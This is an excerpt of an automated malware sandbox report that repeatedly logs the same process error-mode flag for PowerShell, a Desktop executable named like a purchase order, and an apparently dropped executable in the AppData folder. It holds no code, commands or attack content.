              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
